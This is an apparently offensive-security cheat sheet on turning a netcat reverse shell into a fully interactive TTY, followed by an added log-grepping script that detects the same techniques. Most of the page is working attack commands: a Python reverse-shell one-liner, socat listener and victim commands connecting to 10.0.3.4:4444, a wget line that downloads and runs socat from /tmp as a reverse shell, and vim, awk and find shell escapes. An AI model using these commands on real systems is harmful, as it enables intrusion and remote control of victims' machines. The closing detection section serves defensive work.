# Upgrading shell

Netcat is a great tool, but it also has its shortcomings:

* Hitting “Ctrl-C”, for instance, drops the entire shell instead of cancelling the current command as it would in a regular terminal shell;
* You cannot run interactive commands like `su` to log into other local accounts or `ssh` to connect to other hosts;
* Text editors like Vim and Nano cannot be used properly to edit files (only non-interactively);
* Features like job control, tab completion and command history with the up-arrow are also missing.

**To overcome some of these problems we need to switch to an interactive TTY (i.e. terminal) shell.**

## **Different PTY modules**

### Python pty module

```
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Perl

```
perl -e 'exec "/bin/sh";'
```

### Using socat

On Kali (listen):

```
socat file:`tty`,raw,echo=0 tcp-listen:4444
```

On Victim (launch):

```
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```

If socat is not installed on the victim, download a static binary and run it from `/tmp`:

```
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```

### Other ways

```
/bin/sh -i
# from inside an interactive Python interpreter:
import os; os.system('/bin/bash')
# from inside an interactive Perl session (or with perl -e):
exec "/bin/sh";
```

### Related Shell Escape Sequences

Vi / Vim

```
:!bash
```

```
:set shell=/bin/bash
:shell
```

awk

```
awk 'BEGIN {system("/bin/bash")}'
```

find

```
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
```

## **Netcat Magic**

1\. First spawn a PTY shell with python or with bash:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

2\. Background the process with **Ctrl-z**

![](/files/-MkkAL2eNpt0KmnJzrvV)

3\. Examine the current terminal and STTY info so we can force the connected shell to match it:

```
stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
```

The information needed is the size of the current TTY (for example: *rows 38; columns 116*).

4\. With the shell still backgrounded, set the current STTY to raw mode and turn off echoing of the input characters (`-echo`) with the following command:

```
stty raw -echo
```

With a raw stty, input/output will look weird and you won’t see the next commands, but as you type they are being processed.

5\. Next foreground the shell with `fg`. It will re-open the reverse shell but the formatting will be off. Finally, type `reset` and press Enter to reinitialize the terminal (you will not see what you type).

6\. After the `reset` the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above):

```
export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 116
```

![](/files/-MkkBIUGDudcnVQ5AIzG)

The end result is a fully interactive TTY with all the features we’d expect (tab-complete, history, job control, etc) all over a netcat connection :)

### **Obtaining a full interactive shell with zsh**

**Current Kali terminals use zsh by default, so it is important to learn this method: the one above will not work from a zsh shell.**

1\. Get a TTY shell with the commands above, then background the process with **Ctrl+Z**

2\. Get the number of rows and columns with

```
stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
```

3\. To ignore hotkeys in the local shell and return to your reverse shell, enter

```
stty raw -echo; fg
# Note: For zsh users it is important to enter this in one line!
```

4\. Configure your rows and columns

```
stty rows <ROWS> cols <COLS>
```

5\. Export the terminal type

```
export TERM=xterm-256color
```

6\. All you need to do now, is reload your shell:

```
exec /bin/bash
```
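From the defender's side, the commands on this page are also good process-execution indicators. The following is an added example (not part of the original notes) that greps constructed log lines for the pty.spawn, socat/pty, `stty raw -echo`, awk and perl patterns listed above; the log layout (timestamp, user, command line) is an assumed format, not a specific product's.

```shell
#!/bin/sh
# Added example: flag process-execution log lines containing the TTY-upgrade
# and shell-escape patterns documented on this page. The log lines and their
# "timestamp user cmdline" layout are constructed for the demo (assumption).
SAMPLE_LOG='2024-01-01T10:00:01 www-data python3 -c import pty; pty.spawn("/bin/bash")
2024-01-01T10:00:02 www-data stty raw -echo
2024-01-01T10:00:03 alice python3 manage.py runserver
2024-01-01T10:00:04 www-data /tmp/socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:198.51.100.7:4444
2024-01-01T10:00:05 www-data awk BEGIN {system("/bin/bash")}
2024-01-01T10:00:06 bob vim notes.txt
2024-01-01T10:00:07 www-data perl -e exec "/bin/sh";
2024-01-01T10:00:08 alice stty -a'

# Extended regexes, one per line, for the techniques shown above.
TTY_UPGRADE_PATTERNS='pty\.spawn\(
socat .*exec:.*pty
stty raw -echo
awk .*system\("/bin/(ba)?sh"\)
perl .*exec "/bin/(ba)?sh"'

# Read log lines on stdin; print each line matching at least one pattern,
# prefixed with the first pattern that hit. $1 = newline-separated patterns.
flag_tty_upgrade_lines() {
  patterns=$1
  while IFS= read -r line; do
    printf '%s\n' "$patterns" | while IFS= read -r pat; do
      if printf '%s\n' "$line" | grep -Eq -- "$pat"; then
        printf 'HIT [%s] %s\n' "$pat" "$line"
        break
      fi
    done
  done
}

# Number of flagged lines in the constructed sample (5 of the 8 lines).
count_sample_hits() {
  printf '%s\n' "$SAMPLE_LOG" | flag_tty_upgrade_lines "$TTY_UPGRADE_PATTERNS" | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_LOG" | flag_tty_upgrade_lines "$TTY_UPGRADE_PATTERNS"
```

In practice the same patterns would be fed to auditd/execve or EDR command-line telemetry; the benign `stty -a` and `vim` lines show why the match must be on the full argument string rather than on the program name alone.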
